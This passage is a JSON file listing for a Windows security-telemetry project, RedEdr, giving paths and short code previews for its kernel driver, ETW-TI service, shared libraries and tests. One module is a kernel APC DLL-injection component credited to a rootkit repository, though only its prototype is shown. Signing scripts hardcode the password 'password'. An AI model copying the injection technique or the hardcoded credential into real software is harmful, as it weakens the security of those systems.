"preview": "#pragma once\n\n#include <ntddk.h>\n#include <stdio.h>\n\n\n#define PROC_NAME_LEN 128\n\ntypedef struct _PROCESS_INFO {\n HAND"
},
{
"path": "RedEdrDriver/kapcinjector.c",
"chars": 11620,
"preview": "\n#include <ntifs.h>\n// from https://github.com/0xOvid/RootkitDiaries/\n\n\n// set dispach drivers\n\n/*\nPsSetLoadImageNotifyR"
},
{
"path": "RedEdrDriver/kapcinjector.h",
"chars": 110,
"preview": "#pragma once\n\nint KapcInjectDll(IN PUNICODE_STRING ImageName, IN HANDLE ProcessId, IN PIMAGE_INFO pImageInfo);"
},
{
"path": "RedEdrDriver/kcallbacks.c",
"chars": 26500,
"preview": "#include <Ntifs.h>\n#include <ntddk.h>\n#include <ntstrsafe.h>\n\n#include \"upipe.h\"\n#include \"kapcinjector.h\"\n#include \"kca"
},
{
"path": "RedEdrDriver/kcallbacks.h",
"chars": 1537,
"preview": "#pragma once\n\n#include <Ntifs.h>\n#include <ntddk.h>\n\n\n#define TD_CALLBACK_REGISTRATION_TAG '0bCO' // TD_CALLBACK_REGIST"
},
{
"path": "RedEdrDriver/settings.c",
"chars": 462,
"preview": "\n#include \"settings.h\"\n\n\nSettings g_Settings;\n\n\nvoid init_settings() {\n\tg_Settings.init_processnotify = 1;\n\tg_Settings.i"
},
{
"path": "RedEdrDriver/settings.h",
"chars": 528,
"preview": "#pragma once\n\n#include <ntddk.h>\n\n#include \"../Shared/common.h\"\n\ntypedef struct _Settings{\n\tint init_processnotify;\n\tint"
},
{
"path": "RedEdrDriver/upipe.c",
"chars": 3475,
"preview": "#include <Ntifs.h>\n#include <ntddk.h>\n\n#include \"../Shared/common.h\"\n#include \"utils.h\"\n#include \"upipe.h\"\n\n\n// Handle t"
},
{
"path": "RedEdrDriver/upipe.h",
"chars": 194,
"preview": "#pragma once\n\n// Function declarations\nvoid InitializePipe();\nvoid CleanupPipe();\nint LogEvent(char*);\nint IsUserspacePi"
},
{
"path": "RedEdrDriver/utils.c",
"chars": 3366,
"preview": "#include <Ntifs.h>\n#include <ntstrsafe.h> // Required for RtlStringCbVPrintfA\n\n#include \"../Shared/common.h\"\n\n#define K"
},
{
"path": "RedEdrDriver/utils.h",
"chars": 423,
"preview": "#pragma once\n#include <stdio.h>\n#include <Ntifs.h>\n\n\nvoid LOG_A(int severity, char* format, ...);\nint IsSubstringInUnico"
},
{
"path": "RedEdrPplService/README.md",
"chars": 848,
"preview": "# RedEdr PPL Service\n\n* Used to consume ETW-TI\n* Will send it via pipe to main RedEdr\n* Requires to be started as PPL se"
},
{
"path": "RedEdrPplService/RedEdrPplService.cpp",
"chars": 4780,
"preview": "#include <Windows.h>\n\n#include \"../Shared/common.h\"\n#include \"etwtireader.h\"\n#include \"control.h\"\n#include \"logging.h\"\n#"
},
{
"path": "RedEdrPplService/RedEdrPplService.vcxproj",
"chars": 9738,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
},
{
"path": "RedEdrPplService/RedEdrPplService.vcxproj.filters",
"chars": 3049,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "RedEdrPplService/control.cpp",
"chars": 9031,
"preview": "#include <Windows.h>\n\n#include \"control.h\"\n#include \"emitter.h\"\n#include \"../Shared/common.h\"\n#include \"logging.h\"\n#incl"
},
{
"path": "RedEdrPplService/control.h",
"chars": 87,
"preview": "#pragma once\n\nextern BOOL g_ServiceStopping;\n\nvoid StartControl();\nvoid StopControl();\n"
},
{
"path": "RedEdrPplService/emitter.cpp",
"chars": 695,
"preview": "#include <Windows.h>\n\n#include \"../Shared/common.h\"\n#include \"piping.h\"\n#include \"logging.h\"\n\n\nPipeClient pipeClient(\"Re"
},
{
"path": "RedEdrPplService/emitter.h",
"chars": 129,
"preview": "#pragma once\n\n#include <Windows.h>\n\nvoid SendEmitterPipe(char* buffer);\nBOOL ConnectEmitterPipe();\nvoid DisconnectEmitte"
},
{
"path": "RedEdrPplService/etwtihandler.cpp",
"chars": 4192,
"preview": "#include <windows.h>\n#include <evntrace.h>\n#include <tdh.h>\n#include <string>\n\n#include \"etwtihandler.h\"\n#include \"loggi"
},
{
"path": "RedEdrPplService/etwtihandler.h",
"chars": 421,
"preview": "#pragma once\n\n#include <evntrace.h>\n#include <vector>\n#include <string>\n\n#include <krabs.hpp>\n\nvoid event_callback(const"
},
{
"path": "RedEdrPplService/etwtireader.cpp",
"chars": 2452,
"preview": "#include <windows.h>\n#include <evntrace.h>\n#include <tdh.h>\n#include <krabs.hpp>\n\n\n#include \"etwtireader.h\"\n#include \"et"
},
{
"path": "RedEdrPplService/etwtireader.h",
"chars": 54,
"preview": "\nvoid StartEtwtiReader();\nvoid ShutdownEtwtiReader();\n"
},
{
"path": "RedEdrPplService/logging.cpp",
"chars": 3619,
"preview": "#include <iostream>\n#include <windows.h>\n\n#include <chrono>\n#include <ctime>\n#include <iomanip>\n#include <sstream>\n#incl"
},
{
"path": "RedEdrPplService/logging.h",
"chars": 202,
"preview": "#include \"../Shared/common.h\"\n\nvoid LOG_W(int verbosity, const wchar_t* format, ...);\nvoid LOG_A(int verbosity, const ch"
},
{
"path": "RedEdrPplService/packages.config",
"chars": 155,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packages>\n <package id=\"Microsoft.O365.Security.Krabsetw\" version=\"4.4.3\" targ"
},
{
"path": "RedEdrPplService/uthash.h",
"chars": 73991,
"preview": "/*\nCopyright (c) 2003-2022, Troy D. Hanson https://troydhanson.github.io/uthash/\nAll rights reserved.\n\nRedistribution a"
},
{
"path": "RedEdrShared/RedEdrShared.vcxproj",
"chars": 8690,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
},
{
"path": "RedEdrShared/RedEdrShared.vcxproj.filters",
"chars": 2810,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "RedEdrShared/etw_krabs.cpp",
"chars": 4655,
"preview": "#include <Windows.h>\n#include <iostream>\n#include <string>\n#include <sstream>\n#include <krabs.hpp>\n#include \"json.hpp\"\n\n"
},
{
"path": "RedEdrShared/etw_krabs.h",
"chars": 132,
"preview": "\n#include <krabs.hpp>\n#include <json.hpp>\n\nnlohmann::json KrabsEtwEventToJsonStr(const EVENT_RECORD& record, krabs::sche"
},
{
"path": "RedEdrShared/json.hpp",
"chars": 939118,
"preview": "// __ _____ _____ _____\n// __| | __| | | | JSON for Modern C++\n// | | |__ | | | | | | version 3.11"
},
{
"path": "RedEdrShared/loguru.cpp",
"chars": 60555,
"preview": "#if defined(__GNUC__) || defined(__clang__)\n// Disable all warnings from gcc/clang:\n#pragma GCC diagnostic push\n#pragma "
},
{
"path": "RedEdrShared/loguru.hpp",
"chars": 56595,
"preview": "/*\nLoguru logging library for C++, by Emil Ernerfeldt.\nwww.github.com/emilk/loguru\nIf you find Loguru useful, please let"
},
{
"path": "RedEdrShared/mypeb.h",
"chars": 9220,
"preview": "#pragma once\n\n#include <stdio.h>\n#include <windows.h>\n#include <iostream>\n#include <string>\n#include <vector>\n\n\n// https"
},
{
"path": "RedEdrShared/myprocess.cpp",
"chars": 6127,
"preview": "#include <windows.h>\n#include <iostream>\n#include <string>\n#include <vector>\n#include <tlhelp32.h>\n\n#include \"myprocess."
},
{
"path": "RedEdrShared/myprocess.h",
"chars": 821,
"preview": "#pragma once\n\n#include <windows.h>\n#include <string>\n#include <vector>\n\n#include \"process_query.h\"\n#include \"process_mem"
},
{
"path": "RedEdrShared/packages.config",
"chars": 155,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packages>\n <package id=\"Microsoft.O365.Security.Krabsetw\" version=\"4.4.3\" targ"
},
{
"path": "RedEdrShared/piping.cpp",
"chars": 11136,
"preview": "\n#include <Windows.h>\n#include <sddl.h>\n#include <iostream>\n#include <vector>\n#include <string>\n\n#include \"piping.h\"\n#in"
},
{
"path": "RedEdrShared/piping.h",
"chars": 1392,
"preview": "#pragma once\n\n#include <Windows.h>\n#include <vector>\n#include <string>\n#include <mutex>\n\n#include \"../Shared/common.h\"\n\n"
},
{
"path": "RedEdrShared/process_mem_static.cpp",
"chars": 2061,
"preview": "#include <windows.h>\n#include <vector>\n#include <string>\n\n#include \"process_mem_static.h\"\n\n\nMemStatic::MemStatic() {\n}\n\n"
},
{
"path": "RedEdrShared/process_mem_static.h",
"chars": 859,
"preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <string>\n\n#include \"ranges.h\"\n#include \"json.hpp\"\n\n\n\nclass"
},
{
"path": "RedEdrShared/process_query.cpp",
"chars": 20619,
"preview": "#include <windows.h>\n#include <wintrust.h>\n#include <wincrypt.h>\n#include <iostream>\n#include <string>\n#include <vector>"
},
{
"path": "RedEdrShared/process_query.h",
"chars": 1455,
"preview": "#pragma once\n\n#include <windows.h>\n#include <vector>\n#include <string>\n#include <iostream>\n\n\nstd::wstring GetProcessName"
},
{
"path": "RedEdrShared/process_resolver.cpp",
"chars": 9113,
"preview": "#include <windows.h>\n#include <iostream>\n#include <unordered_map>\n#include <mutex>\n#include <thread>\n#include <atomic>\n#"
},
{
"path": "RedEdrShared/process_resolver.h",
"chars": 1221,
"preview": "#pragma once\n\n#include <windows.h>\n#include <unordered_map>\n#include <thread>\n#include <atomic>\n#include <chrono>\n\n#incl"
},
{
"path": "RedEdrShared/ranges.cpp",
"chars": 21,
"preview": "\n#include \"ranges.h\"\n"
},
{
"path": "RedEdrShared/ranges.h",
"chars": 3091,
"preview": "#pragma once\n\n#include <Windows.h>\n#include <iostream>\n#include <algorithm>\n#include <vector>\n#include <utility>\n\n\nclass"
},
{
"path": "RedEdrShared/utils.cpp",
"chars": 13778,
"preview": "#include <vector>\n#include <algorithm>\n#include <locale>\n#include <sstream>\n#include <iostream>\n#include <fstream>\n#incl"
},
{
"path": "RedEdrShared/utils.h",
"chars": 1436,
"preview": "#pragma once\n\n#include <windows.h>\n#include <iostream>\n#include <string>\n\n\nvoid PrintWcharBufferAsHex(const wchar_t* buf"
},
{
"path": "RedEdrTester/RedEdrTester.cpp",
"chars": 5113,
"preview": "#include <stdio.h>\n#include <windows.h>\n#include <cwchar>\n#include <cstdlib>\n#include <string>\n#include <sstream>\n#inclu"
},
{
"path": "RedEdrTester/RedEdrTester.vcxproj",
"chars": 8796,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
},
{
"path": "RedEdrTester/RedEdrTester.vcxproj.filters",
"chars": 2919,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "RedEdrTester/packages.config",
"chars": 155,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<packages>\n <package id=\"Microsoft.O365.Security.Krabsetw\" version=\"4.4.3\" targ"
},
{
"path": "Shared/common.h",
"chars": 1258,
"preview": "#pragma once\n\n#ifndef COMMON_H\n#define COMMON_H\n\n#define PIPE_BUFFER_SIZE 8192 // thats the pipe buffer (default 4096)\n#"
},
{
"path": "UnitTests/UnitTestAnalyzer.cpp",
"chars": 298,
"preview": "//#include \"pch.h\"\n#include \"CppUnitTest.h\"\n\n#include \"utils.h\"\n#include \"json.hpp\"\n#include \"logging.h\"\n\n\nusing namespa"
},
{
"path": "UnitTests/UnitTestEventProducer.cpp",
"chars": 820,
"preview": "//#include \"pch.h\"\n#include \"CppUnitTest.h\"\n\n#include \"event_aggregator.h\"\n#include \"utils.h\"\n#include \"json.hpp\"\n#inclu"
},
{
"path": "UnitTests/UnitTestProcessInfo.cpp",
"chars": 4795,
"preview": "//#include \"pch.h\"\n\n#include <windows.h>\n#include <tlhelp32.h>\n#include <tchar.h>\n#include <iostream>\n\n#include \"CppUnit"
},
{
"path": "UnitTests/UnitTestRanges.cpp",
"chars": 2592,
"preview": "#include \"CppUnitTest.h\"\n\n#include \"logging.h\"\n#include \"ranges.h\"\n\nusing namespace Microsoft::VisualStudio::CppUnitTest"
},
{
"path": "UnitTests/UnitTests.cpp",
"chars": 728,
"preview": "#include \"CppUnitTest.h\"\n\n#include \"utils.h\"\n\nusing namespace Microsoft::VisualStudio::CppUnitTestFramework;\n\nnamespace "
},
{
"path": "UnitTests/UnitTests.vcxproj",
"chars": 9480,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" xmlns=\"http://schemas.microsoft.com/developer/msb"
},
{
"path": "UnitTests/UnitTests.vcxproj.filters",
"chars": 2785,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "UnitTests/logging.cpp",
"chars": 1116,
"preview": "#include <iostream>\n#include <windows.h>\n#include <dbghelp.h>\n#include <stdio.h>\n#include \"../Shared/common.h\"\n#include "
},
{
"path": "UnitTests/logging.h",
"chars": 151,
"preview": "#pragma once\n\n#include \"../Shared/common.h\"\nvoid LOG_W(int verbosity, const wchar_t* format, ...);\nvoid LOG_A(int verbos"
},
{
"path": "UnitTests/notepad.json",
"chars": 90768,
"preview": "[{\"type\":\"kernel\",\"time\":\"133737987376815797\",\"callback\":\"create_process\",\"krn_pid\":\"5648\",\"pid\":\"1704\",\"name\":\"\\\\Device"
},
{
"path": "azure_config.json.sample",
"chars": 152,
"preview": "{\n \"StorageAccount\": \"detonator1\",\n \"ContainerName\": \"scripts\",\n \"BlobName\": \"rededr.zip\",\n \"FilePath\": \"C:\\\\rededr\\"
},
{
"path": "azure_upload.ps1",
"chars": 913,
"preview": "# Load config\n$config = Get-Content -Raw -Path \".\\azure_config.json\" | ConvertFrom-Json\n\n# cleanup\n$path = \"C:\\rededr\\da"
},
{
"path": "elam_driver/elam_driver.c",
"chars": 481,
"preview": "#include <ntddk.h>\n#include <wdf.h>\n#include <windowsx.h>\n\nDRIVER_INITIALIZE DriverEntry;\n\n#ifdef ALLOC_PRAGMA\n#pragma a"
},
{
"path": "elam_driver/elam_driver.rc",
"chars": 422,
"preview": "#include <windows.h>\n#include <ntverp.h>\n\n#define VER_FILETYPE VFT_DRV\n#define VER_FILESUBTYPE VFT2"
},
{
"path": "elam_driver/elam_driver.vcxproj",
"chars": 5285,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project DefaultTargets=\"Build\" ToolsVersion=\"12.0\" xmlns=\"http://schemas.micros"
},
{
"path": "elam_driver/elam_driver.vcxproj.Filters",
"chars": 1265,
"preview": "<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuil"
},
{
"path": "generate_cert.ps1",
"chars": 5215,
"preview": "$password = \"password\"\n\n# This is very, very graciouslly taken from Matt G!\n# https://gist.github.com/mattifestation/660"
},
{
"path": "rededr_test.ps1",
"chars": 1816,
"preview": "# RedEdr Test Script\n# Starts RedEdr, traces procexp64.exe, then cleans up\n\n$rededrPath = \"C:\\RedEdr\\RedEdr.exe\"\n#$targe"
},
{
"path": "sign_file.ps1",
"chars": 185,
"preview": "# Change this:\n$password = \"password\"\n\n\n# signtool.exe sign /fd SHA256 /a /v /ph /f $args[0] /p $password $args[1]\nsignt"
}
]